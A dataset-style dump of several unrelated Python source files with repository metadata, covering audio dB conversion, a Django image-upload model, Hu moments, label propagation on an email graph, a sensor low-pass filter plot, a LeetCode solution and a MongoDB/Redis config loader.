fmax=hps.fmax,
n_mels=hps.num_mels)
def _amp_to_db(x):
''' amp to db'''
return 20 * np.log10(np.maximum(1e-5, x))
def _db_to_amp(x):
''' db to amp '''
return np.power(10.0, x * 0.05)
def _normalize(S):
''' normalize '''
return np.clip((S - hps.min_level_db) / -hps.min_level_db, 0, 1)
def _denormalize(S):
'''denormalize '''
return (np.clip(S, 0, 1) * -hps.min_level_db) + hps.min_level_db
| 26.688889 | 78 | 0.652998 |
d68b937d64634350f10e5a80efa8219f50052d65
| 492 |
py
|
Python
|
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | null | null | null |
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 27 |
2020-02-12T07:55:58.000Z
|
2022-03-12T00:19:09.000Z
|
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 2 |
2020-02-18T01:54:55.000Z
|
2020-02-21T11:36:28.000Z
|
from django.db import models
from django.core import validators
# Create your models here.
class Article(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
# thumbnail = models.FileField(upload_to='files',validators=[validators.FileExtensionValidator(['jpg','png','jpeg','gif'],message='文件必须是图片')])
thumbnail = models.FileField(upload_to='%Y/%m/%d',validators=[validators.FileExtensionValidator(['jpg','png','jpeg','gif'],message='文件必须是图片')])
| 61.5 | 147 | 0.739837 |
ba4bc26e98e57af372fb515bdb45ba79fe152105
| 812 |
py
|
Python
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import numpy as np
from transonic import boost, Array
@boost(wraparound=False, cdivision=True, nonecheck=False)
def moments_hu(nu: "float64[:,:]"):
hu: Array[np.float64, "1d", "C"] = np.zeros((7,), dtype=np.float64)
t0: np.float64 = nu[3, 0] + nu[1, 2]
t1: np.float64 = nu[2, 1] + nu[0, 3]
q0: np.float64 = t0 * t0
q1: np.float64 = t1 * t1
n4: np.float64 = 4 * nu[1, 1]
s: np.float64 = nu[2, 0] + nu[0, 2]
d: np.float64 = nu[2, 0] - nu[0, 2]
hu[0] = s
hu[1] = d * d + n4 * nu[1, 1]
hu[3] = q0 + q1
hu[5] = d * (q0 - q1) + n4 * t0 * t1
t0 *= q0 - 3 * q1
t1 *= 3 * q0 - q1
q0 = nu[3, 0] - 3 * nu[1, 2]
q1 = 3 * nu[2, 1] - nu[0, 3]
hu[2] = q0 * q0 + q1 * q1
hu[4] = q0 * t0 + q1 * t1
hu[6] = q1 * t0 - q0 * t1
return np.asarray(hu)
| 29 | 71 | 0.487685 |
301855013a9ca88d3c9c384b1bb74f9680987796
| 3,127 |
py
|
Python
|
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | 3 |
2018-07-17T12:19:44.000Z
|
2019-04-25T14:00:59.000Z
|
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | null | null | null |
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import random
from scipy.misc import comb
def cal_distance(vec1,vec2):
return np.sum(np.square(vec1 -vec2))
def generate_weight_graph(graph_array,max_id,a):
weight_graph = np.zeros((max_id,max_id))
for i in range(0,max_id):
for j in range(i,max_id):
weight_graph[i][j] = np.e**(-cal_distance(graph_array[i],graph_array[j])/(a*a))
weight_graph[j][i] = weight_graph[i][j]
return weight_graph
edge_link = pd.read_table("email-Eu-core.txt",' ',header=None)
labels_res = pd.read_table("email-Eu-core-department-labels.txt"," ",header=None)
# label_class = 42 # from 0 to 41
max_id = max(edge_link[0].max(),edge_link[1].max()) + 1
label_class = len(labels_res[1].unique())
graph_array = np.zeros((max_id, max_id))
for index,row in edge_link.iterrows():
graph_array[row[0]][row[1]] = 1
graph_array[row[1]][row[0]] = 1
weight_graph = generate_weight_graph(graph_array,max_id,1)
for i in range(0,max_id):
weight_graph[i] = weight_graph[i]/weight_graph[i].sum()
def loop(frac):
sum = 0.0
for i in range(0,10):
sum = sum + main(frac)
print("Average result of frac %f is %f "% (frac,sum/10))
def main(frac):
train=labels_res.sample(frac=frac)
test=labels_res.drop(train.index)
matrix = np.zeros((max_id,label_class))
for index,row in train.iterrows():
matrix[index][row[1]] = 1
for index,row in test.iterrows():
matrix[index][random.randint(0,label_class-1)] = 1
iter_count = 0
while(True):
label_true=list()
label_predict = list()
t_matrix = np.dot(weight_graph,matrix)
count = 0
for index,row in train.iterrows():
t_matrix[index].fill(0)
t_matrix[index][row[1]] = 1
for index,row in test.iterrows():
idx = t_matrix[index].argmax()
idx2 = matrix[index].argmax()
label_true.append(row[1])
label_predict.append(idx)
t_matrix[index].fill(0)
t_matrix[index][idx] = 1
if(idx!=idx2):
count = count + 1
matrix = t_matrix
iter_count = iter_count +1
# print("iter %d:"%iter_count, " diff count:",count)
if(count==0):
break
result = rand_index_score(label_true,label_predict)
# print("Converge after %d iterations" %iter_count," Final Rand index score of frac %f"%frac,result)
return result
# print(label_true)
# print(label_predict)
def rand_index_score(clusters, classes):
tp_plus_fp = comb(np.bincount(clusters), 2).sum()
tp_plus_fn = comb(np.bincount(classes), 2).sum()
A = np.c_[(clusters, classes)]
tp = sum(comb(np.bincount(A[A[:, 0] == i, 1]), 2).sum()
for i in set(clusters))
fp = tp_plus_fp - tp
fn = tp_plus_fn - tp
tn = comb(len(A), 2) - tp - fp - fn
return (tp + tn) / (tp + fp + fn + tn)
if __name__ == '__main__':
loop(0.30)
loop(0.35)
loop(0.40)
loop(0.45)
loop(0.50)
loop(0.55)
loop(0.60)
loop(0.65)
loop(0.70)
loop(0.75)
loop(0.80)
| 29.224299 | 104 | 0.60985 |
2324767c83fb836178aa06d842e9fd67e06c402d
| 1,515 |
py
|
Python
|
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | 3 |
2019-11-28T23:18:23.000Z
|
2019-12-02T14:01:02.000Z
|
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | null | null | null |
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | 1 |
2019-12-02T14:34:11.000Z
|
2019-12-02T14:34:11.000Z
|
from matplotlib import pyplot as plt
import numpy as np
import math
def digital_low_pass(cutoff_frequency, input):
# https://en.wikipedia.org/wiki/Low-pass_filter#Simple_infinite_impulse_response_filter
fc = 2 * math.pi * cutoff_frequency
alpha = (fc * dt) / (1 + fc * dt)
output = [0] * len(input)
output[0] = input[0]
print(alpha)
for i in range(1, len(input)):
output[i] = alpha * input[i] + (1 - alpha) * output[i - 1]
return output
with open('LOG2','r') as file:
line = []
for i in file:
line.append(i.rstrip('\n'))
time = []
dtime = []
dt = 0
pitch = []
roll = []
yaw = []
for i in line:
x = i.split('\t')
pitch.append(float(x[0]))
time.append(float(x[3]))
for i in range(1, len(time)):
dtime.append(time[i]-time[i-1])
for i in dtime:
dt += i
dt = dt/len(dtime)
freq = 1.0/dt
fpitch = digital_low_pass(80, pitch)
#froll = digital_low_pass(80, roll)
#fyaw = digital_low_pass(3, yaw)
plt.plot(time, pitch, color='blue', linewidth=1, label='ungefilterter abs. Winkel')
plt.plot(time, fpitch, color='red', linewidth=1, label='gefilterter abs. Winkel mit 80Hz')
plt.xlabel("Zeit in [s]")
plt.ylabel("Absoluter Winkel in [°]")
plt.legend()
plt.show()
print(dt)
#pitch = np.asarray(froll)
#y = np.fft.fft(froll)
y2 = np.fft.fft(yaw)
y3 = np.fft.fft(fyaw)
N = int(len(y2)/2+1)
X = np.linspace(0, freq/2, N, endpoint=True)
#plt.plot(X, np.abs(y[:N]/N))
plt.plot(X, np.abs(y2[:N]/N))
plt.plot(X, np.abs(y3[:N]/N))
plt.show()
| 21.041667 | 91 | 0.625743 |
88d4a2cb2099524d7d8ef471cf73c188d6f7c268
| 640 |
py
|
Python
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums) < 2:
return len(nums)
res = 0
for i in xrange(1, len(nums) - 1):
if nums[i] == nums[i + 1]:
nums[i + 1], nums[i] = nums[i], nums[i - 1]
if nums[i - 1] < nums[i] and nums[i] > nums[i + 1]:
res += 1
if nums[i - 1] > nums[i] and nums[i] < nums[i + 1]:
res += 1
if res or nums[0] != nums[-1]:
res += 2
else:
res = 1
return res
| 27.826087 | 63 | 0.392188 |
4e158cb5dce9aa1a051fd9fadfe515b346835558
| 450 |
py
|
Python
|
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | null | null | null |
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | 2 |
2021-03-31T18:54:16.000Z
|
2021-12-13T19:49:08.000Z
|
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# got文件、MongoDB数据库和Redis数据库配置文件
import os
import sys
import pymongo
import redis
def get_noau_config():
# got文件
if sys.version_info[0] < 3:
import got
else:
import got3 as got
# MongoDB数据库
client = pymongo.MongoClient(os.environ['MONGOHOST'], 27017)
db = client.nk_defect
# Redis数据库
r = redis.StrictRedis(host=os.environ['REDISHOST'], port=6379, db=0)
return got, db, r
| 18.75 | 72 | 0.651111 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.